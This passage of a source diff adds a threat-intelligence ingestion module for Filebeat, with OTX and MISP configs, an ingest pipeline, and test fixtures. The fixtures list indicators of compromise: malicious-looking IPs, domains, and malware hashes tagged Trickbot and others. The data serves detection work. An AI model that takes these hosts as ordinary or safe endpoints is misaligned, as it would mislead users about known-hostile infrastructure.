"misp", + "input.type": "log", + "log.offset": 35697, + "service.type": "threatintel", + "tags": [ + "tlp:white" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Payload delivery", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "22", + "threatintel.misp.attribute.id": "12268", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1456266422", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "email-src", + "threatintel.misp.attribute_count": "133", + "threatintel.misp.date": "2015-12-08", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "22", + "threatintel.misp.info": "Packrat: Seven Years of a South American Threat Actor", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "4", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CUDESO", + "threatintel.misp.orgc.uuid": "56c42374-fdb8-4544-a218-41ffc0a8ab16", + "threatintel.misp.orgc_id": "4", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610637901", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 3, + "threatintel.misp.uuid": "56ccdcaf-f7e4-40d8-bca1-51299062e56a" + }, + { + "@timestamp": "2016-02-23T22:27:34.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 37011, + "service.type": "threatintel", + "tags": [ + "tlp:white" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Artifacts dropped", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "22", + "threatintel.misp.attribute.id": "12298", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1456266454", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "regkey", + "threatintel.misp.attribute_count": "133", + "threatintel.misp.date": "2015-12-08", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "22", + "threatintel.misp.info": "Packrat: Seven Years of a South American Threat Actor", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "4", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CUDESO", + "threatintel.misp.orgc.uuid": "56c42374-fdb8-4544-a218-41ffc0a8ab16", + "threatintel.misp.orgc_id": "4", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610637901", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 3, + "threatintel.misp.uuid": "56ccdcaf-f7e4-40d8-bca1-51299062e56a" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/module.yml b/x-pack/filebeat/module/threatintel/module.yml new file mode 100644 index 000000000000..ed97d539c095 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/module.yml @@ -0,0 +1 @@ +--- diff --git a/x-pack/filebeat/module/threatintel/otx/_meta/fields.yml b/x-pack/filebeat/module/threatintel/otx/_meta/fields.yml new file mode 100644 index 000000000000..d74b9993dae8 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/otx/_meta/fields.yml @@ -0,0 +1,29 @@ +- name: otx + type: group + description: > + Fields for OTX Threat Intel + fields: + - name: id + type: keyword + description: > + The ID of the indicator. + - name: indicator + type: keyword + description: > + The value of the indicator, for example if the type is domain, this would be the value. + - name: description + type: keyword + description: > + A description of the indicator. + - name: title + type: keyword + description: > + Title describing the indicator. + - name: content + type: keyword + description: > + Extra text or descriptive content related to the indicator. + - name: type + type: keyword + description: > + The indicator type, can for example be "domain, email, FileHash-SHA256". diff --git a/x-pack/filebeat/module/threatintel/otx/config/config.yml b/x-pack/filebeat/module/threatintel/otx/config/config.yml new file mode 100644 index 000000000000..42af0a0c8e1b --- /dev/null +++ b/x-pack/filebeat/module/threatintel/otx/config/config.yml @@ -0,0 +1,64 @@ +{{ if eq .input "httpjson" }} + +type: httpjson +config_version: "2" +interval: {{ .interval }} + +request.method: GET +{{ if .ssl }} + - request.ssl: {{ .ssl | tojson }} +{{ end }} +request.url: {{ .url }} +request.transforms: +- set: + target: header.Content-Type + value: application/json +{{ if .api_token }} +- set: + target: header.X-OTX-API-KEY + value: {{ .api_token }} +{{ end }} +{{ if .types }} +- set: + target: url.params.types + value: {{ .types }} +{{ end }} +- set: + target: url.params.modified_since + value: '[[.cursor.timestamp]]' + default: '[[ formatDate (now (parseDuration "-{{ .first_interval }}")) "RFC3339" ]]' + +response.split: + target: body.results + +response.pagination: +- set: + target: url.value + value: '[[ .last_response.body.next ]]' +cursor: + timestamp: + value: '[[ formatDate (now (parseDuration "-{{ .lookback_range }}")) "RFC3339" ]]' + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - decode_json_fields: + fields: [message] + document_id: id + target: json + - add_fields: + target: '' + fields: + ecs.version: 1.6.0 diff --git a/x-pack/filebeat/module/threatintel/otx/ingest/pipeline.yml b/x-pack/filebeat/module/threatintel/otx/ingest/pipeline.yml new file mode 100644 index 000000000000..08ce44a43d72 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/otx/ingest/pipeline.yml @@ -0,0 +1,162 @@ +description: Pipeline for parsing MISP Threat Intel +processors: + +#################### +# Event ECS fields # +#################### +- set: + field: event.ingested + value: '{{_ingest.timestamp}}' +- set: + field: event.kind + value: enrichment +- set: + field: event.category + value: threat +- set: + field: event.type + value: indicator + +###################### +# General ECS fields # +###################### +- rename: + field: json + target_field: threatintel.otx + ignore_missing: true + +##################### +# Threat ECS Fields # +##################### +## File indicator operations +- set: + field: threatintel.indicator.type + value: file + if: "ctx.threatintel?.otx?.type.startsWith('FileHash') || ctx.threatintel?.otx?.type == 'filepath'" +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.file.hash.md5 + ignore_missing: true + if: "ctx.threatintel?.otx?.type == 'FileHash-MD5'" +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.file.hash.sha1 + ignore_missing: true + if: "ctx.threatintel?.otx?.type == 'FileHash-SHA1'" +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.file.hash.sha256 + ignore_missing: true + if: "ctx.threatintel?.otx?.type == 'FileHash-SHA256'" +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.file.hash.pehash + ignore_missing: true + if: "ctx.threatintel?.otx?.type == 'FileHash-PEHASH'" +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.file.hash.imphash + ignore_missing: true + if: "ctx.threatintel?.otx?.type == 'FileHash-IMPHASH'" + +## IP indicator operations +- set: + field: threatintel.indicator.type + value: ipv4-addr + if: ctx.threatintel?.otx?.type == 'IPv4' +- set: + field: threatintel.indicator.type + value: ipv6-addr + if: ctx.threatintel?.otx?.type == 'IPv6' +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.ip + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type != null && ['ipv4-addr', 'ipv6-addr'].contains(ctx?.threatintel?.indicator?.type)" + +## URL indicator operations +- set: + field: threatintel.indicator.type + value: url + if: "ctx?.threatintel?.indicator?.type == null && ['url', 'uri'].contains(ctx.threatintel?.otx?.type)" +- uri_parts: + field: threatintel.otx.indicator + target_field: threatintel.indicator.url + keep_original: true + remove_if_successful: true + if: ctx?.threatintel?.indicator?.type == 'url' +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.url.full + ignore_missing: true + if: "ctx?.threatintel?.otx?.type == 'url' && ctx?.threatintel?.indicator?.url?.original == null" +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.url.path + ignore_missing: true + if: "ctx?.threatintel?.otx?.type == 'uri'" + +## Email indicator operations +- set: + field: threatintel.indicator.type + value: email-addr + if: ctx?.threatintel?.otx?.type == 'email' +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.email.address + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type == 'email-addr'" + +## Domain indicator operations +- set: + field: threatintel.indicator.type + value: domain-name + if: ctx.threatintel?.otx?.type == 'domain' +- rename: + field: threatintel.otx.indicator + target_field: threatintel.indicator.domain + ignore_missing: true + if: "ctx?.threatintel?.indicator?.type == 'domain-name'" + +###################### +# Cleanup processors # +###################### +- set: + field: threatintel.indicator.type + value: unknown + if: ctx?.threatintel?.indicator?.type == null +- script: + lang: painless + if: ctx?.threatintel != null + source: | + void handleMap(Map map) { + for (def x : map.values()) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + map.values().removeIf(v -> v == null); + } + void handleList(List list) { + for (def x : list) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + } + handleMap(ctx); +- remove: + field: + - threatintel.otx.type + - threatintel.otx.id + - message + ignore_missing: true + if: ctx?.threatintel?.indicator?.type != null +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/threatintel/otx/manifest.yml b/x-pack/filebeat/module/threatintel/otx/manifest.yml new file mode 100644 index 000000000000..5bc84d42da3a --- /dev/null +++ b/x-pack/filebeat/module/threatintel/otx/manifest.yml @@ -0,0 +1,22 @@ +module_version: 1.0 + +var: + - name: input + default: httpjson + - name: interval + default: 60m + - name: first_interval + default: 24h + - name: api_token + - name: ssl + - name: types + - name: lookback_range + default: 2h + - name: url + default: "https://otx.alienvault.com/api/v1/indicators/export" + - name: tags + default: [threatintel-otx, forwarded] + +ingest_pipeline: + - ingest/pipeline.yml +input: config/config.yml diff --git a/x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log b/x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log new file mode 100644 index 000000000000..cec2590a82bf --- /dev/null +++ b/x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log @@ -0,0 +1,80 @@ +{"indicator":"86.104.194.30","description":null,"title":null,"content":"","type":"IPv4","id":1588938} +{"indicator":"90421f8531f963d81cf54245b72cde80","description":"MD5 of a5725af4391d21a232dc6d4ad33d7d915bd190bdac9b1826b73f364dc5c1aa65","title":"Win32:Hoblig-B","content":"","type":"FileHash-MD5","id":9751110} +{"indicator":"ip.anysrc.net","description":null,"title":null,"content":"","type":"hostname","id":16782717} +{"indicator":"107.173.58.176","description":null,"title":null,"content":"","type":"IPv4","id":19901748} +{"indicator":"d8c70ca70fd3555a0828fede6cc1f59e2c320ede80157039b6a2f09c336d5f7a","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":31612067} +{"indicator":"f8e58af3ffefd4037fef246e93a55dc8","description":"MD5 of df9b37477a83189cd4541674e64ce29bf7bf98338ed0d635276660e0c6419d09","title":null,"content":"","type":"FileHash-MD5","id":34413770} +{"indicator":"1c62f004d0c9b91d3467b1b8106772e667e7e2075470c2ec7982b63573c90c54","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":111154034} +{"indicator":"8d24a14f2600482d0231396b6350cf21773335ec2f0b8919763317fdab78baae","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA256","id":151858953} +{"indicator":"213.252.244.38","description":null,"title":null,"content":"","type":"IPv4","id":311294364} +{"indicator":"c758ec922b173820374e552c2f015ac53cc5d9f99cc92080e608652aaa63695b","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":406540408} +{"indicator":"0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":565556753} +{"indicator":"aeb08b0651bc8a13dcf5e5f6c0d482f8","description":"MD5 of 0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6","title":null,"content":"","type":"FileHash-MD5","id":565556755} +{"indicator":"6df5e1a017dff52020c7ff6ad92fdd37494e31769e1be242f6b23d1ea2d60140","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":575672549} +{"indicator":"c72fef3835f65cb380f6920b22c3488554d1af6d298562ccee92284f265c9619","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":575672550} +{"indicator":"e711fcd0f182b214c6ec74011a395f4c853068d59eb7c57f90c4a3e1de64434a","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":995160791} +{"indicator":"d3ec8f4a46b21fb189fc3d58f3d87bf9897653ecdf90b7952dcc71f3b4023b4e","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1011989699} +{"indicator":"70447996722e5c04514d20b7a429d162b46546002fb0c87f512b40f16bac99bb","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1011989701} +{"indicator":"29340643ca2e6677c19e1d3bf351d654","description":"MD5 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec","title":"Win64:Malware-gen","content":"","type":"FileHash-MD5","id":1472176322} +{"indicator":"86c314bc2dc37ba84f7364acd5108c2b","description":"MD5 of 9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2","title":"Win64:Malware-gen","content":"","type":"FileHash-MD5","id":1472457325} +{"indicator":"cb0c1248d3899358a375888bb4e8f3fe","description":"MD5 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56","title":"Trojan:Win32/Occamy.B","content":"","type":"FileHash-MD5","id":1472457326} +{"indicator":"d348f536e214a47655af387408b4fca5","description":"MD5 of 3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4","title":"Win64:Malware-gen","content":"","type":"FileHash-MD5","id":1472457327} +{"indicator":"29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413","description":null,"title":"vad_contains_network_strings","content":"","type":"FileHash-SHA256","id":1546012751} +{"indicator":"b105891f90b2a8730bbadf02b5adeccbba539883bf75dec2ff7a5a97625dd222","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1546012939} +{"indicator":"e4db5405ac7ab517d43722e1ca8d653ea4a32802bc8a5410d032275eedc7b7ee","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1546012967} +{"indicator":"465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa","description":null,"title":"Win.Malware.TrickbotSystemInfo-6335590-0","content":"","type":"FileHash-SHA256","id":1564141498} +{"indicator":"5051906d6ed1b2ae9c9a9f070ef73c9be8f591d2e41d144649a0dc96e28d0400","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1564141523} +{"indicator":"14b74cb9be8cad8eb5fa8842d00bb692","description":"MD5 of 465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa","title":"Win.Malware.TrickbotSystemInfo-6335590-0","content":"","type":"FileHash-MD5","id":1564142109} +{"indicator":"a5b59f7d133e354dfc73f40517aab730f322f0ef","description":"SHA1 of 465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa","title":"Win.Malware.TrickbotSystemInfo-6335590-0","content":"","type":"FileHash-SHA1","id":1564142964} +{"indicator":"8d3f68b16f0710f858d8c1d2c699260e6f43161a5510abb0e7ba567bd72c965b","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1566067095} +{"indicator":"ff2dcea4963e060a658f4dffbb119529","description":"MD5 of 5cb822616d2c9435c9ddd060d6abdbc286ab57cfcf6dc64768c52976029a925b","title":"vad_contains_network_strings","content":"","type":"FileHash-MD5","id":1566999970} +{"indicator":"0d73f1a1c4b2f8723fffc83eb3d00f31","description":"MD5 of 29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413","title":"vad_contains_network_strings","content":"","type":"FileHash-MD5","id":1569290125} +{"indicator":"185.25.50.167","description":null,"title":null,"content":"","type":"IPv4","id":1592876453} +{"indicator":"d35a30264c0698709ad554489004e0077e263d354ced0c54552a0b500f91ecc0","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1597058431} +{"indicator":"5264b455f453820be629a324196131492ff03c80491e823ac06657c9387250dd","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1603343478} +{"indicator":"1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56","description":null,"title":"Trojan:Win32/Occamy.B","content":"","type":"FileHash-SHA256","id":1606260302} +{"indicator":"3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA256","id":1606260304} +{"indicator":"b8e463789a076b16a90d1aae73cea9d3880ac0ead1fd16587b8cd79e37a1a3d8","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1606260305} +{"indicator":"113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA256","id":1606260310} +{"indicator":"9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA256","id":1606260311} +{"indicator":"c51024bb119211c335f95e731cfa9a744fcdb645a57d35fb379d01b7dbdd098e","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1606260316} +{"indicator":"ad20c6fac565f901c82a21b70f9739037eb54818","description":"SHA1 of 9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2","title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":1606260341} +{"indicator":"13f11e273f9a4a56557f03821c3bfd591cca6ebc","description":"SHA1 of 3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4","title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":1606260344} +{"indicator":"1581fe76e3c96dc33182daafd09c8cf5c17004e0","description":"SHA1 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec","title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":1606260353} +{"indicator":"b72e75e9e901a44b655a5cf89cf0eadcaff46037","description":"SHA1 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56","title":"Trojan:Win32/Occamy.B","content":"","type":"FileHash-SHA1","id":1606260364} +{"indicator":"maper.info","description":null,"title":null,"content":"","type":"domain","id":1634015726} +{"indicator":"213.252.244.126","description":null,"title":null,"content":"","type":"IPv4","id":1635374317} +{"indicator":"78.129.139.131","description":null,"title":null,"content":"","type":"IPv4","id":1756014820} +{"indicator":"9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543412} +{"indicator":"be9fb556a3c7aef0329e768d7f903e7dd42a821abc663e11fb637ce33b007087","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543416} +{"indicator":"3bfec096c4837d1e6485fe0ae0ea6f1c0b44edc611d4f2204cc9cf73c985cbc2","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543440} +{"indicator":"dff2e39b2e008ea89a3d6b36dcd9b8c927fb501d60c1ad5a52ed1ffe225da2e2","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543441} +{"indicator":"6b4d271a48d118843aee3dee4481fa2930732ed7075db3241a8991418f00d92b","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543445} +{"indicator":"26de4265303491bed1424d85b263481ac153c2b3513f9ee48ffb42c12312ac43","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543456} +{"indicator":"02f54da6c6f2f87ff7b713d46e058dedac1cedabd693643bb7f6dfe994b2105d","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543458} +{"indicator":"103.13.67.4","description":null,"title":null,"content":"","type":"IPv4","id":2114754074} +{"indicator":"80.90.87.201","description":null,"title":null,"content":"","type":"IPv4","id":2114754077} +{"indicator":"80.80.163.182","description":null,"title":null,"content":"","type":"IPv4","id":2114754078} +{"indicator":"91.187.114.210","description":null,"title":null,"content":"","type":"IPv4","id":2114754080} +{"indicator":"170.238.117.187","description":null,"title":null,"content":"","type":"IPv4","id":2117062744} +{"indicator":"e999b83629355ec7ff3b6fda465ef53ce6992c9327344fbf124f7eb37808389d","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":2117884668} +{"indicator":"103.84.238.3","description":null,"title":null,"content":"","type":"IPv4","id":2119746545} +{"indicator":"179.43.158.171","description":null,"title":null,"content":"","type":"IPv4","id":2129763785} +{"indicator":"198.211.116.199","description":null,"title":null,"content":"","type":"IPv4","id":2136050161} +{"indicator":"203.176.135.102","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2136079568} +{"indicator":"fotmailz.com","description":null,"title":null,"content":"","type":"domain","id":2137741373} +{"indicator":"pori89g5jqo3v8.com","description":null,"title":null,"content":"","type":"domain","id":2137741468} +{"indicator":"sebco.co.ke","description":null,"title":null,"content":"","type":"domain","id":2178708355} +{"indicator":"177.74.232.124","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2180669102} +{"indicator":"chishir.com","description":null,"title":null,"content":"","type":"domain","id":2186034800} +{"indicator":"kostunivo.com","description":null,"title":null,"content":"","type":"domain","id":2186034803} +{"indicator":"mangoclone.com","description":null,"title":null,"content":"","type":"domain","id":2186034805} +{"indicator":"onixcellent.com","description":null,"title":null,"content":"","type":"domain","id":2186034807} +{"indicator":"fc0efd612ad528795472e99cae5944b68b8e26dc","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":2186034891} +{"indicator":"24d4bbc982a6a561f0426a683b9617de1a96a74a","description":null,"title":"Sf:ShellCode-DZ\\ [Trj]","content":"","type":"FileHash-SHA1","id":2186034903} +{"indicator":"fa98074dc18ad7e2d357b5d168c00a91256d87d1","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":2186034912} +{"indicator":"e5dc7c8bfa285b61dda1618f0ade9c256be75d1a","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":2186034924} +{"indicator":"96.9.77.142","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2189036445} +{"indicator":"36.89.106.69","description":null,"title":null,"content":"","type":"IPv4","id":2189036446} +{"indicator":"96.9.73.73","description":null,"title":null,"content":"","type":"IPv4","id":2190596263} +{"indicator":"10ec3571596c30b9993b89f12d29d23c","description":"MD5 of 9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6","title":"xor_0x20_xord_javascript","content":"","type":"FileHash-MD5","id":2192837907} diff --git a/x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log-expected.json b/x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log-expected.json new file mode 100644 index 000000000000..e49896b9dea7 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log-expected.json @@ -0,0 +1,1493 @@ +[ + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 0, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "86.104.194.30", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 102, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "90421f8531f963d81cf54245b72cde80", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of a5725af4391d21a232dc6d4ad33d7d915bd190bdac9b1826b73f364dc5c1aa65", + "threatintel.otx.title": "Win32:Hoblig-B" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 312, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.type": "unknown", + "threatintel.otx.content": "", + "threatintel.otx.indicator": "ip.anysrc.net" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 419, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "107.173.58.176", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 523, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "d8c70ca70fd3555a0828fede6cc1f59e2c320ede80157039b6a2f09c336d5f7a", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 688, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "f8e58af3ffefd4037fef246e93a55dc8", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of df9b37477a83189cd4541674e64ce29bf7bf98338ed0d635276660e0c6419d09" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 887, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "1c62f004d0c9b91d3467b1b8106772e667e7e2075470c2ec7982b63573c90c54", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 1053, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "8d24a14f2600482d0231396b6350cf21773335ec2f0b8919763317fdab78baae", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 1234, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "213.252.244.38", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 1339, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "c758ec922b173820374e552c2f015ac53cc5d9f99cc92080e608652aaa63695b", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 1505, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 1671, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "aeb08b0651bc8a13dcf5e5f6c0d482f8", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 1871, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": 